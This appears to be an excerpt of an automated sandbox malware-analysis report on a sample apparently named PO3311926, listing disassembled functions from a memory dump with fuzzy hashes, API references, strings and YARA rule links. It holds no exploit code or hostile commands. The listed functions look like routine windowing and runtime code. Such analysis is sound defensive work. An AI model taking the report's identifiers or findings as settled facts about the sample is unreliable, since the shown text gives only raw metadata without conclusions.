Instruction Fuzzy Hash: D662C57164C3858FCB15CF28C8909B9BBE1EFD9304F1885ADE89A8B346DB70E945CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00BAF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: dc45cd0a93fb74ca6c6b68a664385609ebd958e7c5a977a68a3f4d62015208f1
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: 00524972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0569ea7b087a224b888af153e8d43b30d6abe6200f23b9c60c1386cedc1a4377
Instruction ID: 9bc28152bb7d0392c237a809a0fd7ef85a44863e6c9fa27cbbb2a2c2cb980d51
Opcode Fuzzy Hash: 0569ea7b087a224b888af153e8d43b30d6abe6200f23b9c60c1386cedc1a4377
Instruction Fuzzy Hash: D312B0B16587068FC728CF28C490AB9B7E0FB94304F14496EE996C7780DBB4E995CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00BAC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 924e57609e90db63803a38c95c2938ee0ba9d708673076b7747caf125b4ab3f9
Instruction ID: 0012d7957342448d5f2a23b1fe7e4951dd2487c55e85a36631659e00864640c7
Opcode Fuzzy Hash: 924e57609e90db63803a38c95c2938ee0ba9d708673076b7747caf125b4ab3f9
Instruction Fuzzy Hash: 5FF19771A0C3018FC719CF28C584A2BBFE5FFCA318F655AAEF48597252D630E9458B46

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77efe516d77cf9fdb51e1e2b0a24aa0296a31c8d9dc96f5ac09728e44828836
Instruction ID: d04a3f8a4702d79679df77c06eb07fe69a646038e22dfc497c884178f71a08dd
Opcode Fuzzy Hash: e77efe516d77cf9fdb51e1e2b0a24aa0296a31c8d9dc96f5ac09728e44828836
Instruction Fuzzy Hash: CAE16B745083948FC314CF29D88086ABFF0BF9A310F46495EF9D49B352D639EA19DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction ID: 14deacafdc17d09e1bfae48d130a90d0ca644e7a6389866c1803c56e8ce7a9f4
Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
Instruction Fuzzy Hash: A49145B06043499BDB24EE68D8D1BFE77D5FBA1300F1009ADE59687283DBB89945C352

Uniqueness

Uniqueness Score: -1.00%

Function 00BB43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 8da55d8125e1c6217730dcc8f89de103cd7667348bca5236c567eeecc11954c2
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 6981F1B16043465BDB24DE68C8D1BFD77D4FBA5304F0009ADE9868B283DFA48985C762

Uniqueness

Uniqueness Score: -1.00%

Function 00BC51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365a6fc50a575ca88bdfbc362ca55a4d09e5a2dbcea005e325d96c2a7fa16909
Instruction ID: 3752b06a579357b590509641b35b846cb0927c72982faf00b6fbd399137c93f0
Opcode Fuzzy Hash: 365a6fc50a575ca88bdfbc362ca55a4d09e5a2dbcea005e325d96c2a7fa16909
Instruction Fuzzy Hash: 83617931600F4957DB389A689CD6FBE63D8EB91350F1406DEE883DF281D691FDC28619

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: cf2d89b5a4ba1d9ed526e62c93565cba69b29045989e1b392585d72ab18a7c9a
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 5E514761600F445BDF384A6885AAFBF27C5DB02300F5809DEE886DB282C715FEC583A6

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6048402cabb5e5435dd103d1f5021b5fdb5589520d8cb31b9dd845a28cf430c
Instruction ID: c9f54893683be26a9f53ed04f03f702449910ade8987824f65a3641200eb43fe
Opcode Fuzzy Hash: b6048402cabb5e5435dd103d1f5021b5fdb5589520d8cb31b9dd845a28cf430c
Instruction Fuzzy Hash: C951C23150C3D68EC712DF64C5404BEBFE0AE9B314F4A09EEE4D95B243D221DA4ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BB00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98bb5bedb0789e9c2917f3d6eec34d2bc4d458babf5d4d06eac8c8efa746f3f7
Instruction ID: 789ecc8b01f59e93dfc0cc181332ff4e24179ed2433520ff1cffe7f0d2b0048d
Opcode Fuzzy Hash: 98bb5bedb0789e9c2917f3d6eec34d2bc4d458babf5d4d06eac8c8efa746f3f7
Instruction Fuzzy Hash: 4A51DFB1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734EA59CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 9795e9d1638114037e53203e6d01b49966067ab5eb23286cc08060320abf4273
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: A331E7B1A147468FCB14DF28C8911BEBBE0FB95704F10456DE495C7742C779EA0ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC73F Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 428windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BBC744

Part of subcall function 00BBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BBB3FB

_wcslen.LIBCMT ref: 00BBCA0A
_wcslen.LIBCMT ref: 00BBCA13
SetWindowTextW.USER32(?,?), ref: 00BBCA71
_wcslen.LIBCMT ref: 00BBCAB3
_wcsrchr.LIBVCRUNTIME ref: 00BBCBFB
GetDlgItem.USER32(?,00000066), ref: 00BBCC36
SetWindowTextW.USER32(00000000,?), ref: 00BBCC46
SendMessageW.USER32(00000000,00000143,00000000,00BEA472), ref: 00BBCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BBCC7F

Strings

ProgramFilesDir, xrefs: 00BBCB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00BBCB1A
%s.%d.tmp, xrefs: 00BBC940
<br>, xrefs: 00BBC9D4

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: 6ff1740d797c882b1d111ad7fe6bb70f23874ef12a1282e2c4b0e9df6a1763e1
Instruction ID: 5c0fb4670d8ed065da0e04221415d43477e2fedb631ef994ded6e2bec7603785
Opcode Fuzzy Hash: 6ff1740d797c882b1d111ad7fe6bb70f23874ef12a1282e2c4b0e9df6a1763e1
Instruction Fuzzy Hash: 27E13F72900259ABDB25DBA0DC95EFE77FCEB04750F4080E6F649E3051EBB49A848B64

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BAE30E

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

Part of subcall function 00BB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BE1030,?,00BAD928,00000000,?,00000050,00BE1030), ref: 00BB1DC4

_strlen.LIBCMT ref: 00BAE32F
SetDlgItemTextW.USER32(?,00BDE274,?), ref: 00BAE38F
GetWindowRect.USER32(?,?), ref: 00BAE3C9
GetClientRect.USER32(?,?), ref: 00BAE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00BAE475
GetWindowRect.USER32(?,?), ref: 00BAE4A2
SetWindowTextW.USER32(?,?), ref: 00BAE4DB
GetSystemMetrics.USER32(00000008), ref: 00BAE4E3
GetWindow.USER32(?,00000005), ref: 00BAE4EE
GetWindowRect.USER32(00000000,?), ref: 00BAE51B
GetWindow.USER32(00000000,00000002), ref: 00BAE58D

Strings

$%s:, xrefs: 00BAE302
CAPTION, xrefs: 00BAE4BD
d, xrefs: 00BAE3F5

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: e2b24ebf71a062909c80c86712b23e09dbd36898d5bb8d4c425f13acae76a2f8
Instruction ID: 6587ae6a738ad4e9c2673f90122ddae33d74a78d666fe114a4111ec5567d0602
Opcode Fuzzy Hash: e2b24ebf71a062909c80c86712b23e09dbd36898d5bb8d4c425f13acae76a2f8
Instruction Fuzzy Hash: A381BE72608341AFD710DFA8CC89B6FBBEDEB89704F05092DFA95A7250D630E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BCCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00BCCB66

Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC71E
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC730
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC742
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC754
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC766
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC778
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC78A
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC79C
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7AE
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7C0
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7D2
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7E4
Part of subcall function 00BCC701: _free.LIBCMT ref: 00BCC7F6

_free.LIBCMT ref: 00BCCB5B

Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4

_free.LIBCMT ref: 00BCCB7D
_free.LIBCMT ref: 00BCCB92
_free.LIBCMT ref: 00BCCB9D
_free.LIBCMT ref: 00BCCBBF
_free.LIBCMT ref: 00BCCBD2
_free.LIBCMT ref: 00BCCBE0
_free.LIBCMT ref: 00BCCBEB
_free.LIBCMT ref: 00BCCC23
_free.LIBCMT ref: 00BCCC2A
_free.LIBCMT ref: 00BCCC47
_free.LIBCMT ref: 00BCCC5F

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 265201387fd9c2f31a059b8162a5082b2d7940754ad43d3e6dc2151640f03288
Instruction ID: af4074a303af8b6a35b2bf303a8f20222c4f6833e6d2a879d652c611b6f04b81
Opcode Fuzzy Hash: 265201387fd9c2f31a059b8162a5082b2d7940754ad43d3e6dc2151640f03288
Instruction Fuzzy Hash: 92313B316042099FEB21AA78E846F5BBBE9EF20310F1554AEE59DD7192DF35EC40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00BBD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00BBD6ED

Part of subcall function 00BB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00BAC116,00000000,.exe,?,?,00000800,?,?,?,00BB8E3C), ref: 00BB1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00BBD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00BBD720
GetObjectW.GDI32(00000000,00000018,?), ref: 00BBD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00BBD75D
DeleteObject.GDI32(00000000), ref: 00BBD764
GetWindow.USER32(00000000,00000002), ref: 00BBD76D

Strings

STATIC, xrefs: 00BBD6F3

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: a263f05cc77e20386a2dc5ff99f0043cf2e7ad6d5c320b69cfa51b5315193ce8
Instruction ID: 6588fefd4b3d19f35f518c24278f1718c7a065717b11113e80546ab4f92b1fde
Opcode Fuzzy Hash: a263f05cc77e20386a2dc5ff99f0043cf2e7ad6d5c320b69cfa51b5315193ce8
Instruction Fuzzy Hash: FD1121726013507BE2216B719C4AFFF76DCEB14701F014161FA02A60A1EBE8CF0586B5

Uniqueness

Uniqueness Score: -1.00%

Function 00BC96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BC9705

Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4

_free.LIBCMT ref: 00BC9711
_free.LIBCMT ref: 00BC971C
_free.LIBCMT ref: 00BC9727
_free.LIBCMT ref: 00BC9732
_free.LIBCMT ref: 00BC973D
_free.LIBCMT ref: 00BC9748
_free.LIBCMT ref: 00BC9753
_free.LIBCMT ref: 00BC975E
_free.LIBCMT ref: 00BC976C

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b91432e27d157648456428ff85df2d5d2f44a52b693d54e7a75850b5b8730838
Instruction ID: 70c36d7e8d0054a98380e0ccee17eb05df58d62cd6200a57fab7e43e2feee4a3
Opcode Fuzzy Hash: b91432e27d157648456428ff85df2d5d2f44a52b693d54e7a75850b5b8730838
Instruction Fuzzy Hash: 5A11B376110109BFDB01EF98D882EDD3BB5EF14350B5254E9FA498F262DE32EE509B84

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

